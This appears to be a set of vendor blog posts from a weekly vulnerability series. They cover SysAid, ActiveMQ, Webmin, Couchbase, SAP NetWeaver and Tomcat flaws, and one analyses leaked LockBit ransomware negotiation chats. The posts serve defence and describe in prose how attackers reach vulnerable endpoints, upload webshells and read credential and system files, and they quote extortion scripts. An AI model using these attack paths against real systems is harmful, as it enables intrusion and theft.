Informed Vendor Conversations: FocusTags™ facilitate targeted and meaningful discussions with vendors, addressing their specific security posture in relation to identified vulnerabilities.
Comprehensive Security Overview: With a clear, broad view of the threat landscape, FocusTags™ contribute to stronger, more proactive cybersecurity strategies.
Black Kite’s FocusTags™ transform complex cyber threat data into actionable intelligence, empowering TPRM professionals to effectively manage risks, reduce exposure, and bolster security.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
FocusTagsTM in the Last 30 Days:
Ivanti EPMM – May2025: CVE-2025-4427, CVE-2025-4428, Authentication Bypass and Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile (EPMM)
SysAid On-Premises: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
Apache ActiveMQ – May2025: CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
Webmin: CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
Couchbase Server: CVE-2025-46619, LFI Vulnerability in Couchbase Server.
SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
It’s a question we hear a lot at Black Kite. It’s reasonable on the surface, but ultimately misleading.
It’s like asking a meteorologist how many weather events they track. The number might be high, but it tells you nothing about whether a severe storm is headed for your house. The same logic applies here. The total count of vulnerabilities a platform covers—or claims to cover—doesn’t actually tell you how well it assesses risk to your business.
At Black Kite, we don’t optimize for volume. We optimize for relevance, discoverability, and actionability. Because when it comes to third-party risk, more data is not necessarily better data. It’s just more noise.
CVE ‘Coverage’ Doesn’t Tell the Whole Story
More than 40,000 CVEs were published in 2024. Narrow it down to those with a CVSS score above 9.0, and you’re still looking at more than 4,400 critical issues.
Understandably, many security teams start with scale: How much of that are we tracking? However, “coverage” is a flawed metric. Here’s why:
1. It depends entirely on the scope. What’s being covered? Every CVE ever published? Just critical ones? Only those with active exploitation? The definition of “coverage” varies so widely that it becomes almost meaningless.
2. Visibility is variable. We identify vulnerable software versions only when they’re visible via OSINT—through headers, banners, exposed services, and so on. Not every version leaves enough of a fingerprint to be seen externally (i.e., discoverable by bad actors). As detection techniques evolve, our coverage evolves. This isn’t a static number.
3. More CVEs don’t mean better insight. If a system is severely outdated, it’s already high-risk. Tagging it with 500 additional CVEs doesn’t make it more actionable. In fact, it often dilutes the signal. What matters is knowing the right vulnerabilities, not all of them.
The takeaway? CVE count is a distraction. What’s important is whether the vulnerabilities you can see are the ones that matter—and whether they’re likely to be exploited in the wild.
What Actually Matters in Vulnerability Intelligence
At Black Kite, our job isn’t to show you every CVE (although we do offer quite a robust CVE database with TPRM insights to the public). For our customers, our job is to surface the few dozen vulnerabilities that truly matter for your vendor ecosystem—so you can act quickly and decisively.
We get there in two ways.
1. Auto-Scanning for Patch Management Risk
Our platform continuously scans exposed infrastructure using passive OSINT techniques like banner grabbing, protocol response analysis, and header inspection. From that, we extract product and version data (when available), match it to known Common Platform Enumerations (CPEs), and map it to vulnerabilities from NIST’s National Vulnerability Database.
We apply strict filters to keep the output meaningful:
Focus on CVEs from the past two years unless they’re especially high-impact.
Exclude low-severity vulnerabilities.
Prioritize CVEs likely to be discoverable via OSINT.
Limit the number of CVEs associated with a given asset.
For example, if we find a server running Windows Server 2008 R2, we flag the 10 most relevant CVEs. We don’t tag all 500-plus known vulnerabilities for that product. The additional volume wouldn’t change the risk signal. It’s already high.
2. FocusTags™ for High-Priority Threats
Some vulnerabilities warrant immediate action. For these, we created FocusTags™—a curated set of CVEs selected for their real-world risk based on exploitability, exposure, and threat actor interest.
For example, in 2024, more than 40,000 CVEs were published.
Around 1,000 passed our initial risk filters.
Of those, 780 were designated high-priority.
295 received FocusTags based on their visibility in OSINT and likely impact.
These tags often overlap with known exploited vulnerabilities—many of which we flagged before public exploitation was confirmed. In certain cases, we used advanced techniques like TLS certificate analysis or favicon hash matching to surface assets that don’t respond to traditional scanning methods.
A note: Black Kite is not a vulnerability scanner. We do not perform authenticated internal scans. Instead, we use OSINT to identify whether systems appear susceptible to known vulnerabilities. Our goal is to measure risk exposure—not confirm exploit paths or patch status.
Rethink Third-Party Vulnerability Management with Black Kite
Yes, the threat landscape is growing more complex. But so are the tools we have to manage it.
We no longer need to chase every vulnerability across every vendor. With the right intelligence, we can take a more targeted, more effective approach. That means better prioritization, smarter remediation, and stronger overall cyber resilience.Want to see what that looks like in practice? Read our full 2025 Supply Chain Vulnerability Report.
Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.
This week’s Focus Friday highlights four high-priority vulnerabilities affecting widely used enterprise technologies: SysAid On-Premises, Apache ActiveMQ, Webmin, and Couchbase Server. Each of these products serves a critical function—whether facilitating IT service management, message brokering, system administration, or database operations. Their importance makes them prime targets for exploitation, and this week’s disclosures demonstrate both the breadth and depth of third-party risks facing modern enterprises.
From pre-authentication remote code execution in SysAid to denial-of-service vulnerabilities in ActiveMQ, privilege escalation flaws in Webmin, and file disclosure issues in Couchbase, the potential for vendor-side compromise is substantial. This week’s blog dissects these incidents through a Third-Party Risk Management (TPRM) lens and explains how Black Kite’s FocusTags™ empower organizations to swiftly identify which vendors are truly at risk and prioritize outreach accordingly.
Filtered view of companies with SysAid On-Premises FocusTag™ on the Black Kite platform.
What are the SysAid On-Premises Pre-Auth XXE Vulnerabilities?
In March 2025, multiple critical pre-authentication XML External Entity (XXE) injection vulnerabilities were disclosed in SysAid On-Premises, a widely used IT Service Management (ITSM) solution. These flaws—CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777—impact the /mdm/checkin, /mdm/serverurl, and /lshw endpoints respectively. Improper XML parsing in these components allows attackers to inject external entities, enabling unauthenticated access to sensitive local files or performing Server-Side Request Forgery (SSRF).
The vulnerabilities are classified as Critical, each carrying a CVSS score of 9.3, although these scores were not officially published at the time of writing. A working Proof-of-Concept (PoC) exploit is publicly available. While these CVEs are not yet listed in CISA’s Known Exploited Vulnerabilities (KEV), historical precedence—such as the exploitation of CVE-2023-47246 by the Cl0p ransomware group—suggests high likelihood of active weaponization.
All three vulnerabilities are patched in SysAid On-Premises version 24.4.60 b16, released in March 2025. Earlier versions remain susceptible, including v23.3.40, the version confirmed to be vulnerable by researchers.
Why Should TPRM Professionals Be Concerned About These SysAid Vulnerabilities?
SysAid On-Premises is more than just helpdesk software—it is a business-critical, internet-facing ITSM platform. It manages internal tickets, configuration data, asset inventories, and privileged workflows across an enterprise. As such, any compromise could cascade across multiple internal systems.
The pre-authentication nature of these vulnerabilities significantly lowers the exploitation barrier, especially since one of the attack paths exposes the plaintext administrator password stored in the InitAccount.cmd file. With that credential, attackers gain privileged access to the SysAid environment, and in known exploit chains, this leads to Remote Command Execution (RCE) via a separate post-auth command injection vector.
Vendors using SysAid On-Premises are at elevated risk of compromise through:
Data theft from internal ticketing systems
Hijacking of asset and configuration repositories
Leveraging helpdesk channels for internal spear-phishing
Deployment of ransomware through administrative access
These risks multiply when threat actors use the platform as a pivot to access more sensitive parts of a vendor’s network.
What Questions Should TPRM Professionals Ask Vendors About These SysAid Vulnerabilities?
Organizations managing third-party risk should direct the following questions to vendors potentially using SysAid On-Premises:
Have you updated all instances of SysAid On-Premises to version 24.4.60 b16 or later to mitigate the risk of CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777?
Can you confirm that all external access points to SysAid endpoints (/mdm/checkin, /mdm/serverurl, /lshw) have been appropriately secured or restricted from unauthorized external connections to prevent XML External Entity (XXE) injection and Server-Side Request Forgery (SSRF)?
Have you implemented monitoring measures to detect suspicious or malicious requests targeting the SysAid endpoints (/mdm/checkin, /mdm/serverurl, /lshw) that were previously vulnerable to XXE injection and SSRF?
Have you reviewed and updated your incident response procedures to ensure rapid identification and remediation capabilities for XXE-based vulnerabilities, specifically those identified in CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777?
Remediation Recommendations for Vendors Subject to This Risk
Vendors should take the following remediation steps to mitigate these vulnerabilities:
Upgrade Immediately to SysAid On-Premises version 24.4.60 b16 or later.
Restrict or firewall external access to /mdm/checkin, /mdm/serverurl, and /lshw endpoints to limit exposure.
Audit the file system for the presence of InitAccount.cmd or other artifacts containing plaintext credentials and securely delete them.
Continuously monitor logs for anomalous or suspicious activity directed at the vulnerable endpoints.
Implement server-side XML parsing hardening practices across all Java-based services to prevent future XXE flaws.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the SysAid On-Premises [Suspected] FocusTag™ on May 7, 2025, identifying vendors potentially exposed to CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777. The FocusTag enables third-party risk managers to zero in on vendors that are running vulnerable assets, significantly reducing the time required to triage broad vulnerabilities.
The tag includes:
Asset-level attribution such as IP addresses and subdomains hosting vulnerable versions
Vendor-specific insights into deployment confidence levels (Medium in this case)
References to public exploit code and vulnerability details
This tag empowers TPRM professionals to focus only on vendors truly at risk, minimizing redundant outreach and enabling faster remediation.
Black Kite’s SysAid On-Premises FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-27533 in Apache ActiveMQ
What is CVE-2025-27533 in Apache ActiveMQ?
CVE-2025-27533 is a medium-severity vulnerability identified in Apache ActiveMQ, a widely used open-source message broker. The flaw arises from improper validation of buffer sizes during the unmarshalling of OpenWire commands. An attacker can exploit this vulnerability by sending specially crafted OpenWire packets that trigger excessive memory allocation, leading to memory exhaustion and potential denial-of-service (DoS) attacks.
Exploit Conditions for CVE-2025-27533
An attacker can exploit this vulnerability only if all of the following are true:
OpenWire Protocol Is Reachable
The flaw is triggered during the unmarshalling of OpenWire commands.
The attacker must be able to send data over OpenWire (the protocol clients use to communicate with the ActiveMQ broker).
Mutual TLS (mTLS) Is Disabled
mTLS prevents unauthorized clients from connecting to the broker.
When mTLS is turned off (the default setting), attackers can readily establish sessions and deliver malicious OpenWire messages.
Authentication Is Not Enforced
If mTLS isn’t required, the broker may accept incoming connections without verifying credentials.
This allows unauthenticated, remote attackers to trigger memory exhaustion on the broker.
Although no PoC exploit code is currently available for CVE‑2025‑27533 and it remains tracked under Apache issue AMQ‑6596 without inclusion in CISA’s KEV catalog, its potential for unauthenticated memory‑exhaustion attacks against critical messaging brokers poses a serious reliability and availability risk in enterprise environments.
Why Should TPRM Professionals Care About CVE-2025-27533?
Apache ActiveMQ serves as a critical component in many enterprise environments, facilitating communication between different applications and systems. A DoS attack exploiting this vulnerability could disrupt business operations, leading to service outages and potential data loss. Furthermore, if mutual TLS (mTLS) is not enabled, attackers can exploit this vulnerability remotely without authentication, increasing the risk of widespread impact.
What questions should TPRM professionals ask vendors about CVE-2025-27533?
Have you updated all instances of Apache ActiveMQ to the patched versions (6.1.6 or later, 5.19.0 or later, 5.18.7 or later, 5.17.7 or later, 5.16.8 or later) to mitigate the risk of CVE-2025-27533?
Can you confirm if you have implemented Mutual TLS (mTLS) on your Apache ActiveMQ to prevent unauthorized clients from establishing connections to the broker and potentially exploiting CVE-2025-27533?
Have you set up automated monitoring and alerting for sudden spikes in memory usage or broker performance degradation, which may signal exploitation attempts of CVE-2025-27533?
Have you restricted network access to ActiveMQ broker ports—especially OpenWire (typically TCP port 61616)—to only trusted IP ranges or internal systems to mitigate the risk of CVE-2025-27533?
Remediation Recommendations for Vendors Subject to This Risk
Upgrade Immediately: Update Apache ActiveMQ to one of the patched versions: 6.1.6 or later, 5.19.0 or later, 5.18.7 or later, 5.17.7 or later, 5.16.8 or later.
Implement Mutual TLS: For affected brokers that cannot yet be upgraded, enforce mutual TLS (mTLS) to mitigate unauthenticated remote access.
Restrict Network Access: Limit access to ActiveMQ broker ports—especially OpenWire (typically TCP port 61616)—to only trusted IP ranges or internal systems.
Monitor Resource Usage: Set up automated monitoring and alerting for sudden spikes in memory usage or broker performance degradation.
Inspect Logs and Network Traffic: Review ActiveMQ logs and network traffic for anomalies or malformed OpenWire command activity.
Test Application Compatibility: After upgrading, validate that internal applications depending on ActiveMQ still function as expected.
Use Web Application Firewalls (WAF) or Proxies: If possible, front ActiveMQ brokers with reverse proxies or WAFs that can enforce additional traffic validation and rate-limiting.
Develop an Incident Response Plan: Prepare your IR team to respond to a broker-level DoS scenario by including procedures for isolating affected brokers, restarting services, and rerouting messaging workloads if necessary.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite provides continuous monitoring and risk assessment capabilities that can help TPRM professionals identify and manage vulnerabilities like CVE-2025-27533. By leveraging Black Kite’s platform, organizations can:
Detects the presence of vulnerable Apache ActiveMQ instances within their vendor ecosystem.
Assess the potential impact of CVE-2025-27533 on their supply chain.
Receive timely alerts and recommendations for remediation actions.
Black Kite’s FocusTag™ for Apache ActiveMQ – May2025, published on May 8, 2025, offers detailed insights into this vulnerability, including affected versions, mitigation strategies, and monitoring recommendations. TPRM professionals can use this information to engage with vendors, ensure timely patching, and enhance their overall risk management posture.
Black Kite’s Apache ActiveMQ – May2025 FocusTagTM details critical insights on the event for TPRM professionals.
What is the Webmin CRLF Injection Privilege Escalation Vulnerability?
CVE-2025-2774 is a critical CRLF (Carriage Return Line Feed) injection vulnerability affecting Webmin versions prior to 2.302. This flaw arises from improper neutralization of CRLF sequences in CGI request handling, allowing authenticated attackers to manipulate HTTP headers and execute arbitrary code with root privileges. The vulnerability has a CVSS score of 8.8, indicating high severity and low exploit probability.
Discovered and reported to the vendor on February 28, 2025, the vulnerability was publicly disclosed on May 1, 2025. As of now, there is no evidence of exploitation in the wild, and it has not been added to CISA’s Known Exploited Vulnerabilities catalog.
Why Should TPRM Professionals Be Concerned About This Vulnerability?
Webmin is a widely used web-based system administration tool for Unix-like servers, with over a million installations worldwide. A successful exploit of CVE-2025-2774 could grant attackers root-level access, allowing them to:
Modify or disrupt critical server configurations
Access, modify, or exfiltrate sensitive data
Deploy malware or establish persistent unauthorized access
Disrupt services and operations
Given Webmin’s role in managing critical server functions, this vulnerability poses significant risks to organizations relying on it for system administration.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-2774?
Can you confirm if you have updated all your Webmin installations to version 2.302 or later to mitigate the risk of the CRLF Injection Privilege Escalation Vulnerability (CVE-2025-2774)?
Have you implemented robust access controls and limited user permissions to prevent low-privilege Webmin accounts from exploiting this vulnerability?
Are you actively reviewing your server and Webmin logs for signs of unusual or suspicious activities, particularly around CGI request handling, as a measure to detect potential exploitation of CVE-2025-2774?
Have you ensured that your incident response plans include scenarios involving privilege escalation and immediate steps for isolation, investigation, and remediation in the event of a successful exploitation of the CRLF Injection Privilege Escalation Vulnerability (CVE-2025-2774)?
Remediation Recommendations for Vendors Subject to This Risk
Immediately update Webmin installations to version 2.302 or later.
Restrict Webmin access to trusted networks and enforce strong authentication practices.
Review server and Webmin logs diligently for signs of unusual or suspicious activities.
Implement and maintain robust access controls, following the principle of least privilege.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the FocusTag for CVE-2025-2774 on May 7, 2025. TPRM professionals can utilize Black Kite’s platform to identify vendors potentially affected by this vulnerability. The platform provides asset information, such as IP addresses and subdomains, associated with the vendors’ systems, enabling organizations to assess and manage third-party risks effectively.
Black Kite’s Webmin FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-46619 – Couchbase Server Local File Inclusion Vulnerability
What is the Couchbase Server Local File Inclusion Vulnerability?
CVE-2025-46619 is a high-severity Local File Inclusion (LFI) vulnerability identified in Couchbase Server versions prior to 7.6.4 (all platforms) and 7.2.7 (Windows builds). Affected Versions are 7.6.3, 7.6.2, 7.6.1, 7.6.0, 7.2.6, 7.2.5, 7.2.4, 7.2.3, 7.2.2, 7.2.1, 7.2.0, 7.1.x, 7.0.x, 6.x, 5.x, 4.x, 3.x, 2.x.
This flaw allows unauthorized users to access sensitive system files, such as /etc/passwd or /etc/shadow, without proper authorization. The vulnerability arises from improper access controls, enabling attackers to read arbitrary files on the server.
The vulnerability was publicly disclosed on April 30, 2025. As of now, there is no evidence of exploitation in the wild, and it has not been added to CISA’s Known Exploited Vulnerabilities catalog. The vulnerability’s CVSS score of 7.6 is currently classified as High.
Why Should TPRM Professionals Be Concerned About This Vulnerability?
Couchbase Server is a widely-used NoSQL document database, integral to many enterprise applications. Exploitation of CVE-2025-46619 could allow attackers to access sensitive configuration files, leading to potential data breaches or system compromises. Given the prevalence of Couchbase in critical systems, this vulnerability poses a significant risk to organizations relying on it for data management.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-46619?
Have you upgraded all instances of Couchbase Server to version 7.6.4 (cross-platform) or 7.2.7 (Windows) to mitigate the risk of CVE-2025-46619?
Can you confirm that you have implemented monitoring and auditing measures to detect unusual file-read attempts, specifically related to potential exploitation of the Local File Inclusion (LFI) vulnerability in Couchbase Server?
Have you conducted an internal verification to inventory all Windows deployments of Couchbase Server and confirmed they are running versions 7.2.7 or higher?
Have you reviewed and adjusted the configuration of any web-facing interfaces to ensure they do not expose arbitrary file paths, as recommended in the remediation measures for CVE-2025-46619?
Remediation Recommendations for Vendors Subject to This Risk
Immediately upgrade Couchbase Server to version 7.6.4 or 7.2.7 (for Windows) to remediate the LFI vulnerability.
Restrict database process permissions to prevent unauthorized file reads.
Ensure that any web-facing interfaces do not expose arbitrary file paths.
Monitor access logs for unusual file-read attempts and conduct regular vulnerability scans.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the FocusTag™ for CVE-2025-46619 on May 6, 2025. TPRM professionals can utilize Black Kite’s platform to identify vendors potentially affected by this vulnerability. The platform provides asset information, such as IP addresses and subdomains, associated with the vendors’ systems, enabling organizations to assess and manage third-party risks effectively.
Black Kite’s Couchbase Server FocusTagTM details critical insights on the event for TPRM professionals.
Enhancing Vendor Risk Management with Black Kite’s FocusTags™
In an era where threat actors rapidly pivot to exploit newly disclosed vulnerabilities, organizations need fast, intelligent ways to assess third-party exposure. That’s where Black Kite’s FocusTags™ come into play—especially for critical flaws like those found in SysAid, Apache ActiveMQ, Webmin, and Couchbase Server.
Here’s how Black Kite’s FocusTags™ amplify TPRM efficiency and precision:
Vendor-Specific Risk Identification: By tagging vendors with confirmed or suspected exposure to these vulnerabilities, FocusTags™ eliminate guesswork and reduce the number of vendors that require immediate attention.
Asset-Level Context: Beyond just naming the vendor, FocusTags™ provide concrete intelligence—such as IP addresses or subdomains hosting vulnerable systems—making the risk truly actionable.
Prioritized Outreach: Knowing which vendors are affected and how, enables TPRM teams to send targeted, informed questionnaires rather than blanketed inquiries that burden vendors and slow down triage.
Holistic Threat Context: FocusTags™ incorporate exploitation status, CISA KEV presence, patch availability, and severity scoring, giving teams a full-spectrum view of risk.
With Black Kite’s FocusTags™, your organization is empowered to act swiftly and precisely—not just to understand where exposure exists, but to take meaningful, time-sensitive steps to reduce risk in a constantly evolving threat landscape.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
FocusTagsTM in the Last 30 Days:
SysAid On-Premises: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
Apache ActiveMQ – May2025: CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
Webmin: CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
Couchbase Server: CVE-2025-46619, LFI Vulnerability in Couchbase Server.
SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
From corporate-sounding breach statements to templated negotiations and ESXi support, LockBit blurred the line between cybercrime and customer service — until they were hacked themselves.
If you’ve ever imagined ransomware gangs as chaotic bands of hoodie-wearing hackers launching attacks from the shadows, LockBit would like a word — preferably via encrypted chat, with structured pricing, timezone-aware support, and test decrypts to elp you “experience the product” before buying.
LockBit operates with a surprising level of business sophistication, offering structured pricing, customer support, and even test decrypts. This article details their corporate-like breach announcement after being hacked themselves, their tiered negotiation tactics, and their understanding of enterprise IT environments like ESXi. Ultimately, defenders need to recognize this business-like approach to ransomware in order to better anticipate and prevent future attacks.
LockBit Is All Business
After being hacked themselves on May 7, 2025, LockBit released a statement so polished it could’ve been run through a corporate PR team:
“I’m currently investigating how the breach happened and rebuilding the system… no decryptors or any stolen company data were harmed. The full panel and blog are still operational.”
They even offered to pay for intel on the perpetrator (“xoxo” from Prague) — a move eerily reminiscent of a bug bounty program, though they may have just misread a cheeky “hugs and kisses from Prague” sign-off as a hacker’s handle.
LockBit’s leaked breach notice, posted on their own dark web site, reads like a corporate status update — reassuring users that no decryptors or stolen data were affected, and bizarrely offering a bounty for “xoxo from Prague,” which may just be a sarcastic sign-off rather than a hacker’s alias.
Yes, you read that correctly.
This isn’t just ransomware. It’s ransomware-as-a-business. And if LockBit had an investor pitch deck, I wouldn’t be surprised if it included growth charts and an affiliate referral program.
But that’s the thing: LockBit wasn’t just a criminal enterprise. It was a business. A brand. A platform. And just like any startup past its prime, it had structured pricing, technical documentation, customer onboarding…and a spectacular fall.
From Peak Power to a Platform Breach
Before Operation Cronos dismantled parts of its infrastructure earlier this year, LockBit was the reigning king of ransomware. They leaked data from over 200 victims per month, supported hundreds of affiliates, and ran a criminal operation with all the polish of a B2B tech firm.
After Cronos, that number dropped to single digits per month. Many affiliates walked away. And when LockBit got breached themselves, the mask slipped, revealing not just their systems, but their business logic.
The leaked negotiation chats read less like ransom demands and more like CRM transcripts.
The Defaced LockBit site displays a taunting message: “Don’t commit a crime. CRIME IS BAD. xoxo from Prague”—which the gang seemingly misread as a hacker alias in their breach response.
How to Sell a Ransom, LockBit Style
LockBit’s chats followed a consistent rhythm: name your price, offer a taste, apply pressure, close the deal. Sound familiar?
1. Negotiation, But Make It Tiered
One small business pleads:
“We feel like the price is high. Can we agree on $3,600?”
LockBit’s response?
“Ok, $3600” (reduced from $4,000)
But after an initial discount, they’re not here for haggling:
“no” “There will be no more talk about discounts.”
A typical LockBit negotiation: scripted replies, tiered pricing, and just enough flexibility to close the deal — all wrapped in ransomware-as-a-service professionalism.
Ransom pricing was neatly aligned with perceived company size:
Small businesses: $1,500–$4,000
Mid-sized companies: $30K–$70K
Large enterprises: $100K–$150K+
Total across all negotiations: $767,800 Average ask: $40,410
This isn’t chaos. It’s value-based pricing.
2. Customer Service Scripts, with Encryption
“You can attach a few files for test decryption by packing them into an archive…” “Please wait for a reply, sometimes it takes several hours due to possible time zone differences.”
These lines appear over and over — clearly copy-pasted.
We’re not dealing with improvisation here. We’re dealing with internal playbooks and canned responses. Like Zendesk, but for extortion.
3. Trust-Building with Freemium Tactics
Need proof that the decryptor works? No problem.
“We can decrypt few random files for FREE.” “You will need to disable your AV and just run the .exe decryptor.”
That’s not just social engineering. That’s product-led growth.
4. Fear, Shame, and a Bit of Taunting
In one case, a desperate employee begs:
“Please don’t spoil my life… My company will file a case on me… My family will be suffered.” LockBit replies coldly: “I can’t help you, it’s to end this dialog.”
Elsewhere, they mock:
“You know your pass: P@ssw0rd”
They don’t just threaten. They undermine your confidence.
A LockBit negotiation turns transactional: the victim outlines terms like a service agreement, while the operator replies with decryption guarantees, tech support timelines, and even a jab about weak passwords
5. Targeted Pressure, Personalized Pricing
LockBit tailors its tactics to your environment:
“We found a lot of contact information of your employees, clients, partners…” “We will try to convey information about the leak to each of these contacts.”
And if you’re rich?
“I saw your financial report. Our price is not big for you.” “The price…was formed based on the indicators of your company.”
This is market segmentation, but for criminal revenue.
A LockBit negotiation unfolds like a budget meeting—discount requests, financial hardship pleas, and even regional economic context—until the operator cuts it off with cold finality: “There will be no more talk about discounts.”
6. Enterprise IT Support… from Criminals
Need to decrypt an ESXi cluster? LockBit’s got you.
“Log in to vCenter, enable SSH, upload decryptor… run ./decrypt… check decrypt.llg log…” “Do not run multiple decryptors simultaneously… or files may be corrupted.”
We’ve seen fewer steps in vendor documentation. These actors understand virtualization, backup systems, and endpoint behavior.
This isn’t script kiddie territory. This is ransomware with release notes.
The Breach Heard Around the Dark Web
When LockBit got breached, the illusion cracked.
They scrambled to assure “customers” that nothing critical was lost, systems were being rebuilt, and operations were ongoing. The message, minus the extortion and anonymity, would be right at home in an AWS status update.
The offer to pay for intel on “xoxo from Prague” (which again, might’ve just been a sarcastic sign-off) cemented the absurdity: even ransomware groups are vulnerable to phishing and misinterpretation.
They were so committed to acting like a business… they ended up reacting like one too.
Lessons for Defenders
So what now?
LockBit may be on the decline, but the playbook they wrote will outlive them. And the next ransomware “startup” will come with better UX, faster support, and cleaner infrastructure.
To stay ahead, we need to:
Monitor for ransomware susceptibility, not just breaches
Assess vendor-level risk posture, continuously
Recognize criminal operations behaving like product teams
Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.
Welcome to this week’s Focus Friday, where we approach the latest critical vulnerabilities through a third-party risk management lens. We begin with SAP NetWeaver Visual Composer’s unauthenticated file upload RCE (CVE-2025-31324), a zero-day actively exploited on over 1,200 servers. Then, we turn to Apache Tomcat’s April 2025 issues—CVE-2025-31650 (HTTP/2 memory-leak DoS) and CVE-2025-31651 (rewrite-rule bypass)—which pose denial-of-service and data-exposure risks. In each section, we’ll outline key details, TPRM-specific questions, and actionable remediation steps, before demonstrating how Black Kite’s FocusTags™ streamline vendor risk identification and response.
Filtered view of companies with SAP NetWeaver VCFRAMEWORK FocusTag™ on the Black Kite platform.
CVE-2025-31324 in SAP NetWeaver VCFRAMEWORK
What is the SAP NetWeaver VCFRAMEWORK RCE vulnerability?
This issue is an unauthenticated file-upload flaw in the Metadata Uploader component of SAP NetWeaver Visual Composer (VCFRAMEWORK). Attackers can send crafted POST requests to /developmentserver/metadatauploaderto place JSP, WAR, or JAR payloads on the server, then invoke them via simple GET requests—achieving full remote code execution and system takeover. It is rated Critical with a CVSS v3.1 base score of 10.0SAP Support Portal and carries an EPSS score of 55.64%. The National Vulnerability Database first published the CVE on April 24, 2025. Exploitation in the wild has been observed since at least March 27, 2025, primarily targeting manufacturing environments and deploying webshells such as helper.jsp and cache.jsp. Post-exploit tooling includes Brute Ratel C2 and Heaven’s Gate for stealthy persistence (per FocusTag details). This CVE was added to CISA’s Known Exploited Vulnerabilities catalog on April 29, 2025. CISA has not issued a separate advisorial beyond the KEV entry.
Shadowserver Foundation identified 427 internet-exposed SAP NetWeaver servers, with the highest counts in the US, India, and Australia.
Why should TPRM professionals care?
SAP NetWeaver is a widely deployed application server and development platform—often underpinning critical business processes. An unauthenticated RCE in a Visual Composer add-on can lead to full server compromise, unauthorized data access, lateral movement, and supply‐chain ripple effects. TPRM teams must ensure that any third‐party vendors using VCFRAMEWORK have assessed their exposure and applied mitigations promptly to avoid costly incident response and reputational damage.
What questions should TPRM professionals ask vendors about CVE-2025-31324?
To assess vendor risk, consider asking:
Have you applied the emergency patch, SAP Security Note 3594142, to all instances of SAP NetWeaver AS Java 7.xx with the Visual Composer (VCFRAMEWORK) component installed to mitigate the risk of CVE-2025-31324?
Have you conducted an audit to search for and remove unauthorized JSP/WAR/JAR files under ‘…/irj/servlet_jsp/irj/root/’ that may have been uploaded due to the vulnerability in the Metadata Uploader component of SAP NetWeaver Visual Composer?
Have you implemented measures to restrict access to all Metadata Uploader URL variants via SICF, especially if Visual Composer is unused, to prevent unauthenticated file uploads and remote code execution?
Are you actively monitoring your NetWeaver logs and alerting on POSTs to uploader endpoints that return HTTP 200 without an authentication challenge to detect potential exploitation of CVE-2025-31324?
Remediation Recommendations for Vendors subject to this risk
Vendors should take the following steps immediately:
Apply the Emergency Patch: Deploy SAP Security Note 3594142 (released April 25, 2025) without delay.
Restrict Endpoint Access: Disable or firewall all Metadata Uploader URL variants via SICF if Visual Composer is unused.
Audit & Remediate: Search for JSP/WAR/JAR files in the servlet paths and remove any unauthorized webshells.
Monitor & Detect: Forward NetWeaver logs to your SIEM; alert on HTTP 200 POSTs to uploader endpoints that bypass authentication.
Harden Configurations: Enforce HTTPS, require authentication on portal interfaces, and restrict access to trusted hosts.
Run Scanners: Use available CVE-2025-31324 scanning tools to identify remaining exposures and verify remediation.
How TPRM professionals can leverage Black Kite for this vulnerability
Black Kite published the SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag on April 29, 2025, highlighting over 1,200 exposed servers and active exploitation trends. Within the Black Kite platform, TPRM teams can:
Identify at-risk vendors: Automatically surface which third parties in your ecosystem host vulnerable Visual Composer instances.
Pinpoint vulnerable assets: Obtain IP addresses and subdomains linked to exposed VCFRAMEWORK components.
Track remediation progress: Monitor vendor patch status and anomalous telemetry around the /metadatauploader endpoint.
Drive focused outreach: Narrow questionnaires and assessments to only those vendors with confirmed exposure, reducing vendor fatigue and accelerating risk mitigation.
Black Kite’s SAP NetWeaver VCFRAMEWORK FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-31650 & CVE-2025-31651 in Apache Tomcat
What are the CVE-2025-31650 and CVE-2025-31651 vulnerabilities?
